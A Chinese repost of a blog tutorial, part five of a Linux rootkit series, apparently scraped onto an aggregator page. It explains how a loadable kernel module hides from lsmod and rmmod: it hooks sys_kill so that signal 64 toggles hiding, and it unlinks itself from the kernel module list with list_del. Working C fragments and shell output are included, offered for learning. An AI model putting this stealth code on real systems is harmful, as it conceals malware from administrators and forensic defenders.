5从用户空间隐藏内核模块_Linux_Rootkit.md

2024-02-04 22:36

本文主要是介绍5从用户空间隐藏内核模块_Linux_Rootkit.md,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Xcellerator

密码学Linux其他逆向工程

文章目录

  • [Linux Rootkit 第 5 部分:从用户空间隐藏内核模块](https://xcellerator.github.io/posts/linux_rootkits_05/)
  • 内核中的链表
  • 跟踪内核中的模块
  • 编写内核模块
  • 将所有内容放在一起

Linux Rootkit 第 5 部分:从用户空间隐藏内核模块

2020-09-17 :: TheXcellerator

# linux # rootkit #隐形 #链表

到目前为止,我们已经了解了如何充分利用挂钩系统调用和常规函数。但是,考虑到这是一个关于 rootkit 的系列,我们确实应该对隐秘性进行一些考虑。如果您一直在跟踪,那么一旦您加载了任何以前的 Rootkit,只需检查lsmod.

$ lsmod | grep rootkit
rootkit                16384  0

复制

很明显,对吧?但是,我听到你说,这是一个从内核请求信息的用户空间工具!我们当然可以操纵它来忽略我们的小内核模块吗?!如果那是你,那么你就完全正确了。

内核中的链表

好的,计算机科学部分入站!如果您已经熟悉链表的概念,那么您可以安全地跳过几段。

链接列表是一种跟踪同一对象的多个实例的方法。理解它们的最好方法可能是通过例子:

struct my_object {int value;struct my_object *next, *prev;
}

复制

如果这是您第一次看到这样的东西,请再读一遍 - 如果它看起来有点奇怪,那是因为它有点奇怪!结构体的定义my_object是递归的,但 C 仍然可以理解它。我们称其为链表的原因是因为列表中的每个条目都包含指向下一个和上一个条目的指针。列表中的每一项都不知道自己在大局中的位置,只知道谁在前面,谁在后面。

一个非常简单的链表可能如下所示:

struct my_object entry1, entry2, entry3;entry1.prev = NULL;
entry1.next = &entry2;entry2.prev = &entry1;
entry2.next = &entry3;entry3.prev = &entry2;
entry3.next = NULL;

复制

我们这样做的原因是我们不必在包含所有列表条目的地方保留索引!每个项目只需要知道接下来的内容和之前的内容(并将指针保留为NULL第一个/最后一个)。这意味着我们可以简单地通过修改几个nextprev指针来添加/删除/插入一个新项目 - 而无需关心内存中是否有足够的空间或是否需要调整数组大小。

内核大量使用链表。看看include/linux/types.h,我们看到:

struct list_head {struct list_head *next, *prev;
};

复制

my_object这与我们进一步定义结构的方式相同!我们还有一些非常简单的list_add()函数list_del,稍后我们也会使用它们。他们所做的正是你所想的——他们从链接列表中添加和删除项目!

val请注意,在上面的内核源代码片段中,结构中没有条目或类似内容。这是因为,在整个内核的规模上,将list_head结构作为字段包含在另一个结构中,该结构保存我们链接在一起的对象,更容易且更易于管理。结构中的结构!

跟踪内核中的模块

每个加载的内核模块都有一个THIS_MODULE为其设置并可用的对象。我们可以通过查看以下内容看到这一点include/linux/export.h

#ifdef MODULE
extern struct module __this_module;
#define THIS_MODULE (&__this_module)
#else
#define THIS_MODULE ((struct module *)0)
#endif

复制

无论哪种方式,THIS_MODULE都被定义为指向结构的指针module。让我们看一下include/linux/module.h

struct module {enum module_state state;/* Member of list of modules */struct list_head list;/* Unique handle for this module */char name[MODULE_NAME_LEN];/* More stuff we aren't interested in... */
};

复制

在这里我们看到那里有结构,list_head这意味着我们有一个链表!next事实上,在我们的内核模块中,我们可以通过查看指向和模块的指针来找出列表中哪些模块在我们之前/之后prev。作为一个具体的例子,尝试这个简单的模块使用该list_entry()功能。当我们加载它时,我们会看到(在我的系统上):

$ sudo insmod rootkit.ko
$ dmesg
[12956.924033] rootkit: Loaded >:-)
[12956.924034] rootkit: next kernel module = ufs
[12956.924034] rootkit: prev kernel module =

复制

为什么prev模块名称为空?仅仅是因为它rootkit是列表中的第一个模块!检查lsmod(它按照加载的模块在链表中出现的顺序循环)的输出,我们可以看到情况确实如此:

$ lsmod | head -n 5
Module                  Size  Used by
rootkit                16384  0
ufs                    81920  0
qnx4                   16384  0
hfsplus               110592  0

复制

编写内核模块

有了这些知识,我们就可以开始将我们的 Rootkit 组合在一起了。使用与第 3 部分中相同的技术,我们将进行挂钩sys_kill(),以便我们可以发送虚假64信号来切换隐藏或显示的模块。此功能将包含我们需要编写的两个新函数;适当命名hideme()showme()

首先,系统调用挂钩(像往常一样,我只会描述pt_regs挂钩的版本 - 请参阅第 2 部分了解更多信息,或者在此处查看最终完成的 rootkit )。我们将使用一个全局定义的hidden变量来实现隐藏和显示之间的切换(这也意味着我们只需实现一个新信号而不是两个!)。

static short hidden = 0;asmlinkage int hook_kill(const struct pt_regs *regs)
{void showme(void);void hideme(void);int sig = regs->si;if ( (sig == 64) && (hidden == 0) ){printk(KERN_INFO "rootkit: hiding rootkit!\n");hideme();hidden = 1;}else if ( (sig == 64) && (hidden == 1) ){printk(KERN_INFO "rootkit: revealing rootkit!\n");showme();hidden = 0;}elsereturn orig_kill(regs);
}

复制

如果您一直在关注本系列中的其他帖子,那么希望这段代码对您来说非常简单。像往常一样,这个 rootkit 的核心并不在于钩子本身,而是在于showme()hideme()函数。因为我们从“revealed”开始,hideme()总是会在之前被调用showme(),所以让我们先看看这个。

我们不能只是从列表中删除我们的模块并完成 - 否则我们将无法将其添加回来!我们必须在移除自己之前保存当前所处的位置,以便showme()稍后可以将我们带回正确的位置。为此,我们引入另一个全局变量,但这次是一个指向list_head我们将调用的结构的指针prev_module。一旦我们保存了list.prev这个全局指针的条目,我们就可以继续安全地使用 删除自己list_del()

static struct list_head *prev_module;void hideme(void)
{prev_module = THIS_MODULE->list.prev;list_del(&THIS_MODULE->list);
}

复制

容易,对吧?我们应该感谢内核开发人员使用!list_中定义的所有这些宏使我们的生活变得如此轻松。include/linux/list.h值得注意的是,它THIS_MODULE仍然在内存中 - 我们所做的只是操纵链接列表中的指针以跳过它。

有了这个在手,showme()就更简单了。因为我们已经保存了prev_module,所以就像使用list_add()将自己重新插入一样简单:

void showme(void)
{list_add(&THIS_MODULE->list, prev_module);
}

复制

将所有内容放在一起

hook_kill()如果您自己一直在遵循,那么现在是使用 ftrace 和其他声明(不使用)完成系统调用挂钩的好时机pt_regs。或者,您可以像往常一样在repo上找到工作源代码。lsmod构建并加载模块后,再次查看并注意rootkit其中的内容:

$ lsmod | grep rootkit
rootkit                16384  0

复制

现在继续64向任何 pid 发送信号并再次检查:

$ kill -64 1
$ lsmod | grep rootkit
$

复制

没有什么!我们可以检查输出dmesg以查看我们的模块仍在运行:

$ dmesg
[15107.466554] rootkit: Loaded >:-)
[15109.982025] rootkit: hiding rootkit kernel module...

复制

如果我们尝试卸载模块怎么办?

$ sudo rmmod rootkit
rmmod: ERROR: ../libkmod/libkmod-module.c:799 kmod_module_remove_module() could not remove 'rootkit': No such file or directory
rmmod: ERROR: could not remove module rootkit: No such file or directory

复制

它找不到它!这是因为rmmod循环遍历模块链接列表中的每一项,寻找与name我们提供的项相匹配的项。因为我们不在列表中,所以找不到我们!再次向某个地方发送信号64会让我们回来并让我们卸载模块。

$ kill -64 1
$ sudo rmmod rootkit
$ dmesg
[15107.466554] rootkit: Loaded >:-)
[15109.982025] rootkit: hiding rootkit kernel module...
[15252.183065] rootkit: revealing rootkit kernel module...
[15255.439374] rootkit: Unloaded :-(

复制

现在我们开始了 - 现在您可以从用户空间隐藏您的 rootkit!值得指出的是,这是一层非常薄的混淆。事实上,我们的 Rootkit 仍在运行,这意味着我们仍在内存中,任何形式的内存分析或具有远程能力的 DFIR 专业人员都会很快发现我们(特别是使用“rootkit”之类的名称四处走动!)。

希望你喜欢这个 - 直到下一次…

阅读其他帖子


←Linux Rootkit 第 6 部分:隐藏目录Linux Rootkit 第 4 部分:通过干扰 Char 设备为 PRNG 添加后门→

哈维菲利普斯 2020 - 伦敦, 英国:: panr制作的主题

该网站是闹鬼网络的一部分

.io/posts/linux_rootkits_06/)Linux Rootkit 第 4 部分:通过干扰 Char 设备为 PRNG 添加后门→

哈维菲利普斯 2020 - 伦敦, 英国:: panr制作的主题

该网站是闹鬼网络的一部分

<<< 随机 >>>

这篇关于5从用户空间隐藏内核模块_Linux_Rootkit.md的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/679001

相关文章

linux-基础知识3

打包和压缩 zip 安装zip软件包 yum -y install zip unzip 压缩打包命令: zip -q -r -d -u 压缩包文件名 目录和文件名列表 -q:不显示命令执行过程-r:递归处理,打包各级子目录和文件-u:把文件增加/替换到压缩包中-d:从压缩包中删除指定的文件 解压:unzip 压缩包名 打包文件 把压缩包从服务器下载到本地 把压缩包上传到服务器(zip

Linux 网络编程 --- 应用层

一、自定义协议和序列化反序列化 代码: 序列化反序列化实现网络版本计算器 二、HTTP协议 1、谈两个简单的预备知识 https://www.baidu.com/ --- 域名 --- 域名解析 --- IP地址 http的端口号为80端口,https的端口号为443 url为统一资源定位符。CSDNhttps://mp.csdn.net/mp_blog/creation/editor

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

Linux_kernel驱动开发11

一、改回nfs方式挂载根文件系统         在产品将要上线之前,需要制作不同类型格式的根文件系统         在产品研发阶段,我们还是需要使用nfs的方式挂载根文件系统         优点:可以直接在上位机中修改文件系统内容,延长EMMC的寿命         【1】重启上位机nfs服务         sudo service nfs-kernel-server resta

【Linux 从基础到进阶】Ansible自动化运维工具使用

Ansible自动化运维工具使用 Ansible 是一款开源的自动化运维工具,采用无代理架构(agentless),基于 SSH 连接进行管理,具有简单易用、灵活强大、可扩展性高等特点。它广泛用于服务器管理、应用部署、配置管理等任务。本文将介绍 Ansible 的安装、基本使用方法及一些实际运维场景中的应用,旨在帮助运维人员快速上手并熟练运用 Ansible。 1. Ansible的核心概念

Linux服务器Java启动脚本

Linux服务器Java启动脚本 1、初版2、优化版本3、常用脚本仓库 本文章介绍了如何在Linux服务器上执行Java并启动jar包, 通常我们会使用nohup直接启动,但是还是需要手动停止然后再次启动, 那如何更优雅的在服务器上启动jar包呢,让我们一起探讨一下吧。 1、初版 第一个版本是常用的做法,直接使用nohup后台启动jar包, 并将日志输出到当前文件夹n

[Linux]:进程(下)

✨✨ 欢迎大家来到贝蒂大讲堂✨✨ 🎈🎈养成好习惯,先赞后看哦~🎈🎈 所属专栏:Linux学习 贝蒂的主页:Betty’s blog 1. 进程终止 1.1 进程退出的场景 进程退出只有以下三种情况: 代码运行完毕,结果正确。代码运行完毕,结果不正确。代码异常终止(进程崩溃)。 1.2 进程退出码 在编程中,我们通常认为main函数是代码的入口,但实际上它只是用户级

【Linux】应用层http协议

一、HTTP协议 1.1 简要介绍一下HTTP        我们在网络的应用层中可以自己定义协议,但是,已经有大佬定义了一些现成的,非常好用的应用层协议,供我们直接使用,HTTP(超文本传输协议)就是其中之一。        在互联网世界中,HTTP(超文本传输协议)是一个至关重要的协议,他定义了客户端(如浏览器)与服务器之间如何进行通信,以交换或者传输超文本(比如HTML文档)。

如何编写Linux PCIe设备驱动器 之二

如何编写Linux PCIe设备驱动器 之二 功能(capability)集功能(capability)APIs通过pci_bus_read_config完成功能存取功能APIs参数pos常量值PCI功能结构 PCI功能IDMSI功能电源功率管理功能 功能(capability)集 功能(capability)APIs int pcie_capability_read_wo